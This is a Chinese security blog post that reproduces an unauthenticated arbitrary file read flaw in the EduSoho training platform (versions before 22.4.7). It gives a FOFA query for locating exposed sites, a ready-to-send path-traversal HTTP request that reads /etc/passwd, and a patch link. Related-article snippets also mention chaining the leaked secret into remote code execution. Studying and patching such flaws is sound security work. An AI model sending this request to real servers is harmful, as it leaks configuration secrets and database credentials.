【漏洞复现】EduSoho教培系统 任意文件读取漏洞复现

已于 2024-02-02 01:07:31 修改
阅读量490 收藏 8
点赞数 6
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络安全
于 2024-02-01 19:27:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KKleeeaa/article/details/135980824
版权

声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!

0x01 漏洞概述


该教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞,通过该漏洞攻击者可以读取到config/parameters.yml文件的内容。

0x02 影响范围

EduSoho < v22.4.7

0x03Fofa语句 

title="Powered By EduSoho" || body="Powered by <a href=\"http://www.edusoho.com/\" target=\"_blank\">EduSoho" || (body="Powered By EduSoho" && body="var app")

页面大概是这个样子的

0x04漏洞POC

GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

0x05漏洞修复

漏洞修复补丁:https://github.com/edusoho/edusoho/commit/fdb5b503706ab51f0e784576061bc601c3eb9c2b, 升级版本到22.4.7即可

Aniya也会哭
关注
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
EduSoho教培系统 任意文件读取漏洞复现(CNVD-2023-03903)
0xSec
12-15 1079
教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞,通过该漏洞攻击者可以读取到config/parameters.yml文件的内容,拿到该文件中保存的secret值以及数据库账号密码等敏感信息。拿到secret值后,攻击者可以结合symfony框架_fragment路由实现RCE
漏洞复现EduSoho-statistics-文件读取
知黑而守白
01-15 78
Edusoho 网络课堂是面向个人、学校、培训机构及企业用户的友好、开源、高性价比的在线教育建站系统Edusoho 提供在线教学、网校管理、云视频点播、直播、移 APP 等功能,为使教育机构能够以最低成本开展在线教学活动,EduSoho 也提供云服务器,云视频、云直播和移动 APP 定制服务,并配备相应的技术支持服务,让客户搭建自有品牌网校和搭积木一样简单。
任意文件读取漏洞复现
weixin_58954236的博客
09-02 3831
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是漂代码文件,配置文件,敏感文件等等。任意文件读取与下载可能形式不同,但是从本质上讲读取与下载没有区别,从权限角度来讲,读取与下载都需要读权限。
2024年最全教培系统EduSoho任意文件读取漏洞_edusoho历史漏洞(1),2024年最新面试总结+详细解答
最新发布
2401_84545669的博客
05-11 276
Edusoho是面向个人、学校、培训机构及企业用户的友好、开源、高性价比的在线教育建站系统。该系统存在配置文件读取漏洞,攻击者可以通过构造恶意代码,未授权直接下载或读取parameters.yml配置文件内容,里面包含了数据库账号密码以及secret值等敏感信息。
教培系统EduSoho任意文件读取漏洞
Arched的博客
02-01 574
教培系统EduSoho任意文件读取漏洞
复现Edusoho cms任意文件读取漏洞_58
fushuang333的博客
02-25 548
复现Edusoho cms任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统读取或写入任意内容。
漏洞复现-某教育视频云平台前台某接口文件上传漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-07 581
复现某教育视频云平台前台某接口文件上传漏洞,附带自己写的poc脚本
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
nc57-任意文件读取漏洞补丁
06-08
nc57_任意文件读取漏洞补丁
Adminer≤4.6.2任意文件读取漏洞1
08-03
【Adminer≤4.6.2任意文件读取漏洞详解】 Adminer是一款功能强大的Web数据库管理工具,它支持多种主流数据库系统,如MSSQL、MySQL、Oracle、SQLite和PostgreSQL,与phpMyAdmin类似。由于其轻量级的特性,只需一个...
蓝海卓越计费管理系统任意文件读取批量检测脚本
06-16
-u 指定单个url -l 指定url文件 先用fofa搜索所有涉及蓝海系统的url,然后直接跑这个脚本就可以
ngnix 漏洞修复文档
03-03
ngnix 漏洞修复文档
EDUSOHO踩坑笔记之二十二:数据库变更脚本(Migration)
jyl_sh的专栏
06-08 1152
EDUSOHO踩坑笔记之二十二:数据库变更脚本(Migration) Biz Framework 使用phpmig作为数据库变更脚本的引擎,并约定项目根目录下的migrations目录为默认的 migration 脚本所在目录。 基本使用 查看所有命令: php bin/phpmig 生成一个Migration脚本类: bin/phpmig generate YourClassName 参数YourClassName为本次 Migration 脚本类的类名,请根据实际...
EDUSOHO踩坑笔记之四十九:安全
jyl_sh的专栏
06-10 1097
安全 ◆ R1:禁止未过滤的变量拼接 SQL,请使用变量绑定替代。ORDER BY的字段、以及分页参数$start、$limit也需要过滤。防止 SQL 注入攻击。 注意 SQL 注入会导致数据库被拖库、数据被破坏、信息泄露等严重的安全问题,属于 Web 开发安全中,破坏性最大的安全问题。 继承自GeneralDaoImpl的 Dao,可以通过sql($sql, $orderBys=null, $start=null, $limit=null)来组装 OrderBy 以及分页参数。例: ...
记一次edusoho问题
weixin_30505485的博客
06-22 576
问题描述:Edusoho如何迁移到本地windows或另外一台Linux服务器上 解决问题步骤: 1.参考官方文档官方文档地址如下:http://www.qiqiuyu.com/my/course/331 试验过官方文档的方案,发现并不能直接解决我的问题 2.通过提问(像github对应的项目提issue)’ 这个地址关于我对问题的描述和最终解决问题:https://github.com...
漏洞复现EduSoho教培系统 任意文件读取
hackzkaq的博客
02-04 469
EduSoho企培系统,基于EduSoho教育云PaaS平台的底层技术打造,专门为快速发展的企业提供一体化企业培训、企业内训组织解决方案,专注人才培养、专注组织建设,帮助企业构建学习型组织,促成终身学习、实现快速发展。该教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞,通过该漏洞攻击者可以读取到config/parameters.yml文件的内容,拿到该文件中保存的secret值以及数据库账号密码等敏感信息。
逻辑支付漏洞骚操作案例集合
weixin_33694172的博客
06-11 695
Edusoho逻辑支付漏洞 大概思路:假设某网校会员1年2000元,不同与以往的修改金额实现1元买会员,而是在购买会员时,先买合法的年数,例如1年,抓包,将购买的会员年限修改为很大的一个数,例如999999999999年,相应的金额999999999999*2000元。最终要付的钱数就会超出数据类型的最大值,造成数据溢出?放行数据包,会员钱数就会变为1元,年数依然为999999999999年,正...
致远oa wpsassistservlet 任意文件读取漏洞
12-27
致远oa wpsassistservlet 任意文件读取漏洞是一种安全漏洞,攻击者可以利用该漏洞读取系统中的任意文件,包括重要的系统文件及用户数据文件。攻击者可以通过该漏洞来获取敏感信息,危害系统安全。 这个漏洞存在的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值